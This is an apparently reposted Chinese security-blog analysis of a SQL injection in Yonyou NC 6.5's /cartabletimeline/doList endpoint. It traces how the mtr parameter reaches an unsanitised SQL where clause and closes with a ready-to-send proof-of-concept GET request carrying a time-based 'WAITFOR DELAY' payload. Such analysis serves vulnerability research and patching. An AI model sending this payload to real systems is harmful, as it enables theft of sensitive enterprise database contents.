用友NC 漏洞分析cartabletimeline存在SQL注入 POC

admin 2025年2月10日12:58:10评论9 views字数 1388阅读4分37秒阅读模式

 

原文链接:https://forum.butian.net/article/627

作者:WLwl

0x1 漏洞描述

用友NC是一款大型erp企业管理系统与电子商务平台。用友网络科技股份有限公司用友NC存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

影响版本

用友NC6.5

0x2 漏洞分析

VsmAction类中此处存在@Servlet注解,也就是说当访问路径为/cartabletimeline会直接定位到这里。

用友NC 漏洞分析cartabletimeline存在SQL注入 POC
doList方法上面标注了@Action标签,当我们请求/cartabletimeline/doList的时候就会进入该doList方法。

继续看doList方法的详细代码

用友NC 漏洞分析cartabletimeline存在SQL注入 POC
这里接收了一个参数为mtr,并且传入getVehicleApplyInfo函数来执行,传入时将sb变量转为字符串类型。

getVehicleApplyInfo函数是carTalbeService对象进行调用的,而carTalbeService对象是通过ICarTalbeService接口来进行实例化。

进入ICarTalbeService接口

用友NC 漏洞分析cartabletimeline存在SQL注入 POC
追踪ICarTalbeService接口的实现类
定位到PsndocServiceImpl

用友NC 漏洞分析cartabletimeline存在SQL注入 POC
观察getVehicleApplyInfo具体实现内容

用友NC 漏洞分析cartabletimeline存在SQL注入 POC
传入参数后调用了getCarTableQueryService().getgetUserVehicleApplyInfo

查看getCarTableQueryService内容

用友NC 漏洞分析cartabletimeline存在SQL注入 POC
这里返回的是一个carTableQueryService类型的对象,那么去看carTableQueryService类中的getgetUserVehicleApplyInfo方法

用友NC 漏洞分析cartabletimeline存在SQL注入 POC
跟踪queryVOs,定位到CRUDHelper

用友NC 漏洞分析cartabletimeline存在SQL注入 POC
类方法getCRUDService() 根据传入的类名AggVOCrudServiceImpl去加载并返回一个 ILfwCRUDService 类型的实例

定位到ILfwCRUDService

用友NC 漏洞分析cartabletimeline存在SQL注入 POC
查看queryVOs函数内容

用友NC 漏洞分析cartabletimeline存在SQL注入 POC
通过服务定位器ServiceLocator来获取一个实现了 ILfwQueryService 接口的服务实例

定位到ILfwQueryService实现类LfwQueryServiceImpl
参数wherePart不为空,且不以"where"字符结尾,则拼接进sql语句

用友NC 漏洞分析cartabletimeline存在SQL注入 POC

用友NC 漏洞分析cartabletimeline存在SQL注入 POC
至此代码分析结束

0x3 漏洞POC
GET /portal/pt/cartabletimeline/doList?pageId=login&mtr=1)WAITFOR+DELAY+%270:0:2%27--+ HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=4
用友NC 漏洞分析cartabletimeline存在SQL注入 POC
 

原文始发于微信公众号(神农Sec):用友NC 漏洞分析--cartabletimeline存在SQL注入

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月10日12:58:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC 漏洞分析cartabletimeline存在SQL注入 POChttps://cn-sec.com/archives/3722023.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息